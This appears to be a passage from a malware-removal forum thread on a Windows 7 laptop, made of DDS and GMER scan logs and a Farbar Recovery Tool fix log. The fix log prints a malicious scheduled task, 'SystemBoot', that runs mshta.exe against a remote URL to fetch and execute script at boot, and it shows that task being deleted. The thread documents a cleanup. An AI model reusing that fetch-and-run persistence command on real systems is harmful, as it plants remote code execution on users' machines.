R3 btwl2cap;Bluetooth L2CAP Service;C:\windows\System32\drivers\btwl2cap.sys [2011-5-4 35104]
R3 clwvd;CyberLink WebCam Virtual Driver;C:\windows\System32\drivers\clwvd.sys [2011-1-11 31088]
R3 JmUsbCcgp;JMicron USB Composite Device Lower Filter Driver;C:\windows\System32\drivers\jmccgp.sys [2011-5-4 17904]
R3 JmUsbVideo;JMicron 31x Upper Filter Driver;C:\windows\System32\drivers\jmcam.sys [2011-5-4 57072]
R3 JmUsbVideo2;JMicron 31x Lower Filter Driver;C:\windows\System32\drivers\jmcam_lo.sys [2011-5-4 31344]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\windows\System32\drivers\k57nd60a.sys [2010-6-7 406056]
R3 klkbdflt;Kaspersky Lab KLKBDFLT;C:\windows\System32\drivers\klkbdflt.sys [2012-9-3 29280]
R3 klmouflt;Kaspersky Lab KLMOUFLT;C:\windows\System32\drivers\klmouflt.sys [2012-9-3 29280]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 btusbflt;Bluetooth USB Filter;C:\windows\System32\drivers\btusbflt.sys [2010-9-2 54824]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\windows\System32\ieetwcollector.exe [2014-6-12 111616]
S3 JMCR;JMCR;C:\windows\System32\drivers\jmcr.sys [2010-9-2 160880]
S3 netw5v64;Intel(R) Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;C:\windows\System32\drivers\netw5v64.sys [2009-6-10 5434368]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\windows\System32\drivers\rdpvideominiport.sys [2013-7-21 19456]
S3 tapstrong;StrongVPN Adapter;C:\windows\System32\drivers\tapstrong.sys [2013-11-23 38760]
S3 TsUsbFlt;TsUsbFlt;C:\windows\System32\drivers\TsUsbFlt.sys [2013-11-14 56832]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\windows\System32\Wat\WatAdminSvc.exe [2013-7-17 1255736]
S3 wsvd;wsvd;C:\windows\System32\drivers\wsvd.sys [2009-7-21 121840]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2014-06-25 02:30:43 10779000 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{05C4A088-0ED5-4CEA-A347-63B03AA5EA0E}\mpengine.dll
2014-06-25 00:32:36 -------- d-----w- C:\Users\tk\AppData\Local\Fuze Box
2014-06-20 03:05:17 -------- d-----w- C:\Users\tk\AppData\Roaming\VERIZON
2014-06-12 16:07:31 801280 ----a-w- C:\windows\System32\usp10.dll
2014-06-01 01:35:19 -------- d-----w- C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-06-01 01:35:19 -------- d-----w- C:\Program Files\iTunes
2014-06-01 01:35:19 -------- d-----w- C:\Program Files\iPod
2014-06-01 01:35:19 -------- d-----w- C:\Program Files (x86)\iTunes
2014-05-31 00:37:55 98216 ----a-w- C:\windows\SysWow64\WindowsAccessBridge-32.dll
2014-05-27 12:49:19 -------- d-----r- C:\Users\tk\Dropbox
2014-05-27 12:48:08 -------- d-----w- C:\Users\tk\AppData\Roaming\DropboxMaster
2014-05-27 02:16:22 -------- d-----w- C:\Program Files (x86)\YNAB 4
.
==================== Find3M ====================
.
2014-06-12 15:32:47 92768 ----a-w- C:\windows\System32\drivers\klflt.sys
2014-06-08 09:13:05 506368 ----a-w- C:\windows\System32\aepdu.dll
2014-06-08 09:08:04 424448 ----a-w- C:\windows\System32\aeinv.dll
2014-05-30 10:02:37 2724864 ----a-w- C:\windows\System32\mshtml.tlb
2014-05-30 10:02:09 4096 ----a-w- C:\windows\System32\ieetwcollectorres.dll
2014-05-30 09:39:43 548352 ----a-w- C:\windows\System32\vbscript.dll
2014-05-30 09:39:23 66048 ----a-w- C:\windows\System32\iesetup.dll
2014-05-30 09:38:29 48640 ----a-w- C:\windows\System32\ieetwproxystub.dll
2014-05-30 09:21:23 139264 ----a-w- C:\windows\System32\ieUnatt.exe
2014-05-30 09:21:05 111616 ----a-w- C:\windows\System32\ieetwcollector.exe
2014-05-30 09:20:36 752640 ----a-w- C:\windows\System32\jscript9diag.dll
2014-05-30 09:11:24 940032 ----a-w- C:\windows\System32\MsSpellCheckingFacility.exe
2014-05-30 09:08:22 5782528 ----a-w- C:\windows\System32\jscript9.dll
2014-05-30 09:02:39 2724864 ----a-w- C:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55:36 38400 ----a-w- C:\windows\System32\JavaScriptCollectionAgent.dll
2014-05-30 08:44:28 455168 ----a-w- C:\windows\SysWow64\vbscript.dll
2014-05-30 08:43:06 61952 ----a-w- C:\windows\SysWow64\iesetup.dll
2014-05-30 08:42:16 51200 ----a-w- C:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:28:33 112128 ----a-w- C:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27:56 592896 ----a-w- C:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24:19 1249280 ----a-w- C:\windows\System32\mshtmlmedia.dll
2014-05-30 08:23:22 2040832 ----a-w- C:\windows\System32\inetcpl.cpl
2014-05-30 08:10:46 32256 ----a-w- C:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56:56 2266112 ----a-w- C:\windows\System32\wininet.dll
2014-05-30 07:56:50 4244992 ----a-w- C:\windows\SysWow64\jscript9.dll
2014-05-30 07:50:09 1068032 ----a-w- C:\windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49:38 1964544 ----a-w- C:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:21:10 1790976 ----a-w- C:\windows\SysWow64\wininet.dll
2014-05-14 13:14:14 70832 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-05-14 13:14:14 692400 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2014-05-08 09:32:11 3178496 ----a-w- C:\windows\System32\rdpcorets.dll
2014-05-08 09:32:11 16384 ----a-w- C:\windows\System32\RdpGroupPolicyExtension.dll
2014-04-25 02:06:17 626688 ----a-w- C:\windows\SysWow64\usp10.dll
2014-04-24 21:14:00 138664 ----a-w- C:\windows\SysWow64\drivers\AnyDVD.sys
2014-04-24 21:14:00 138664 ----a-w- C:\windows\System32\drivers\AnyDVD.sys
2014-04-15 09:34:10 1070232 ----a-w- C:\windows\SysWow64\MSCOMCTL.OCX
2014-04-12 02:22:05 95680 ----a-w- C:\windows\System32\drivers\ksecdd.sys
2014-04-12 02:22:05 155072 ----a-w- C:\windows\System32\drivers\ksecpkg.sys
2014-04-12 02:19:38 29184 ----a-w- C:\windows\System32\sspisrv.dll
2014-04-12 02:19:38 136192 ----a-w- C:\windows\System32\sspicli.dll
2014-04-12 02:19:37 28160 ----a-w- C:\windows\System32\secur32.dll
2014-04-12 02:19:32 1460736 ----a-w- C:\windows\System32\lsasrv.dll
2014-04-12 02:19:05 31232 ----a-w- C:\windows\System32\lsass.exe
2014-04-12 02:12:06 22016 ----a-w- C:\windows\SysWow64\secur32.dll
2014-04-12 02:10:56 96768 ----a-w- C:\windows\SysWow64\sspicli.dll
2014-04-05 02:47:20 1903552 ----a-w- C:\windows\System32\drivers\tcpip.sys
2014-04-05 02:47:09 288192 ----a-w- C:\windows\System32\drivers\FWPKCLNT.SYS
2014-04-03 02:52:39 458336 ----a-w- C:\windows\System32\drivers\kl1.sys
2014-04-03 02:52:39 29792 ----a-w- C:\windows\System32\drivers\klim6.sys
2014-03-31 16:35:08 270496 ------w- C:\windows\System32\MpSigStub.exe
.
============= FINISH: 20:01:41.03 ===============



.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium
Boot Device: \Device\HarddiskVolume1
Install Date: 7/14/2013 9:21:19 PM
System Uptime: 6/24/2014 6:17:32 AM (14 hours ago)
.
Motherboard: LENOVO | | KL2
Processor: Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz | CPU | 2001/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 420 GiB total, 55.078 GiB free.
D: is FIXED (NTFS) - 30 GiB total, 27.625 GiB free.
E: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP113: 6/24/2014 7:27:40 PM - Removed Evernote v. 5.4
RP114: 6/24/2014 7:30:28 PM - Windows Update
RP115: 6/24/2014 7:52:11 PM - Uniblue SpeedUpMyPC installation
.
==== Installed Programs ======================
.
Acrobat.com
Adobe AIR
Adobe Flash Player 12 ActiveX
Adobe Flash Player 13 Plugin
Adobe Reader XI (11.0.07)
Amazon Kindle
Amazon MP3 Downloader 1.0.18
AnyDVD
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ATI Catalyst Install Manager
Audible Download Manager
BodyMedia SYNC
Bonjour
Broadcom Gigabit NetLink Controller
Catalyst Control Center - Branding
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
Cisco Connect
CloneDVD2
Coupon Printer for Windows
CrashPlan
D3DX10
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition
Dropbox
Energy Management
Fuze Meeting
Google Chrome
Google Drive
Google Update Helper
HandBrake 0.9.9.1
HP Deskjet 1050 J410 series Basic Device Software
HP Deskjet 1050 J410 series Help
HP Update
HPDiagnosticAlert
Intel(R) Management Engine Components
Intel(R) Rapid Storage Technology
iTunes
Java 7 Update 60
Java Auto Updater
JMicron Flash Media Controller Driver
Junk Mail filter update
Kaspersky PURE 3.0
Lenovo Bluetooth with Enhanced Data Rate Software
Lenovo DirectShare
Lenovo EasyCamera
Lenovo MuteSync
Lenovo OneKey Recovery
Lenovo SlideNav
Lenovo YouCam
Mesh Runtime
Microsoft .NET Framework 4.5.1
Microsoft Application Error Reporting
Microsoft Office 2010
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Groove MUI (English) 2010
Microsoft Office InfoPath MUI (English) 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Professional Plus 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Mozilla Firefox 30.0 (x86 en-US)
Mozilla Maintenance Service
MSVCRT
MSVCRT_amd64
Oasis2Service 1.0
Onekey Theater
QuickTime 7
Realtek HDMI Audio Driver for ATI
Realtek High Definition Audio Driver
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Microsoft Excel 2010 (KB2826033) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2767915) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2826023) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2826035) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2878284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition
Skype™ 6.14
Synaptics Pointing Device Driver
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition
Update for Microsoft Office 2010 (KB2878225) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition
Windows Driver Package - Broadcom (BTHUSB) Bluetooth (04/08/2010 6.3.5.430)
Windows Driver Package - Broadcom HIDClass (07/28/2009 6.2.0.9800)
Windows Driver Package - Lenovo (ACPIVPC) System (10/19/2009 5.4.0.1)
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Mesh
Windows Live Mesh ActiveX Control for Remote Connections
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live Remote Client
Windows Live Remote Client Resources
Windows Live Remote Service
Windows Live Remote Service Resources
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
Workout Blender
YNAB 4 version 4.3.543
.
==== Event Viewer Messages From Past Week ========
.
6/22/2014 1:12:00 PM, Error: Service Control Manager [7031] - The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.
6/22/2014 1:12:00 PM, Error: Service Control Manager [7024] - The Windows Search service terminated with service-specific error %%-1073473535.
6/18/2014 6:57:23 AM, Error: volsnap [36] - The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
.
==== End Of File ===========================



GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-06-24 20:12:01
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD50 rev.01.0 465.76GB
Running: 0b7y8kuc.exe; Driver: C:\Users\tk\AppData\Local\Temp\pxldipoc.sys


---- Kernel code sections - GMER 2.1 ----

INITKDBG C:\windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 528 fffff800033b4000 63 bytes [00, 00, 0D, 02, 4B, 4C, 73, ...]
INITKDBG C:\windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 592 fffff800033b4040 22 bytes [78, 06, 5B, 0E, 80, FA, FF, ...]

---- User code sections - GMER 2.1 ----

.text C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[1888] C:\windows\SysWOW64\ntdll.dll!NtQueryValueKey 000000007754faa8 5 bytes JMP 0000000171a819b0
.text C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[1888] C:\windows\SysWOW64\ntdll.dll!NtProtectVirtualMemory 0000000077550038 5 bytes JMP 0000000171a82066
.text C:\windows\system32\Dwm.exe[2136] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\Dwm.exe[2136] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\windows\system32\Dwm.exe[2136] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1900b8
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd190038
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\WINMM.dll!waveOutReset 000007fefb33a38c 5 bytes JMP 000007fefd1902b8
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\WINMM.dll!waveOutPause 000007fefb354b60 5 bytes JMP 000007fefd190238
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\WINMM.dll!waveOutRestart 000007fefb354ba0 5 bytes JMP 000007fefd1901b8
.text C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe[3280] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe[3320] C:\windows\system32\DDRAW.dll!DirectDrawCreate 000007fef265815c 5 bytes JMP 000007fefd1a01b8
.text C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe[3320] C:\windows\system32\DDRAW.dll!DirectDrawCreateEx 000007fef2658968 5 bytes JMP 000007fefd1a0238
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\WINMM.dll!waveOutReset 000007fefb33a38c 5 bytes JMP 000007fefd1902b8
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\WINMM.dll!waveOutPause 000007fefb354b60 5 bytes JMP 000007fefd190238
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\WINMM.dll!waveOutRestart 000007fefb354ba0 5 bytes JMP 000007fefd1901b8
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\ole32.dll!CoCreateInstance 000007fefeb47490 5 bytes JMP 000007fffd190138
.text C:\Program Files\Synaptics\SynTP\SynBtnAsst.exe[3388] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files\Synaptics\SynTP\SynBtnAsst.exe[3388] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\WINMM.dll!waveOutReset 000007fefb33a38c 5 bytes JMP 000007fefd1a02b8
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\WINMM.dll!waveOutPause 000007fefb354b60 5 bytes JMP 000007fefd1a0238
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\WINMM.dll!waveOutRestart 000007fefb354ba0 5 bytes JMP 000007fefd1a01b8
.text C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe[3544] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\taskeng.exe[4060] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\taskeng.exe[4060] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\windows\system32\taskeng.exe[4060] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe[4144] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000110002710
.text C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe[4144] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001100027f0
.text C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe[4144] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000110002780
.text C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe[4372] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 00000001002a2710
.text C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe[4372] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001002a27f0
.text C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe[4372] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 00000001002a2780
.text C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe[4524] C:\windows\system32\KERNEL32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe[4524] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe[4524] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe[4532] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe[4532] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe[4604] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 00000001003a2710
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe[4604] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001003a27f0
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe[4604] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 00000001003a2780
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000110002710
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001100027f0
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000110002780
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000074fd1465 2 bytes [FD, 74]
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 0000000074fd14bb 2 bytes [FD, 74]
.text ... * 2
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[3720] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000110002710
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[3720] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001100027f0
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[3720] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000110002780
.text C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe[4164] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe[4164] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000100642710
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001006427f0
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000100642780
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\ole32.dll!CoCreateInstance 00000000766d9d0b 5 bytes JMP 0000000100642850
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000074fd1465 2 bytes [FD, 74]
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 0000000074fd14bb 2 bytes [FD, 74]
.text ... * 2
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\Windows\SysWOW64\DDRAW.dll!DirectDrawCreate 000000007402859d 5 bytes JMP 0000000100643af0
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\Windows\SysWOW64\DDRAW.dll!DirectDrawCreateEx 000000007402ebc6 5 bytes JMP 0000000100643bb0

---- Threads - GMER 2.1 ----

Thread C:\Program Files\Windows Media Player\wmpnetwk.exe [4092:5620] 000007fefb4e2bf8

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\002269ec2d88
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\889ffadda154
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\002269ec2d88 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\889ffadda154 (not active ControlSet)

---- EOF - GMER 2.1 ----

Problem With Japan PUP mshta

And finally, the log after I clicked the fix button:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:22-06-2014
Ran by IDNABRA at 2014-06-25 11:14:57 Run:1
Running from C:\Users\idnabra\Downloads\AntiVirus
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
Task: {11B37255-DD26-4677-83D6-B3DF832632FF} - System32\Tasks\SystemBoot => mshta.exe http://ahd.qboabndi.org/reg2.php?ccc...Efteq4RxdWABTk
*****************
'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11B37255-DD26-4677-83D6-B3DF832632FF}' => Key deleted successfully.
'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11B37255-DD26-4677-83D6-B3DF832632FF}' => Key deleted successfully.
C:\Windows\System32\Tasks\SystemBoot => Moved successfully.
'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemBoot' => Key deleted successfully.
==== End of Fixlog ====

Up to now I haven't seen the PUP pop up again...
I'll monitor for the next few hours and will reply if it appears again.

A million thanks, mate....
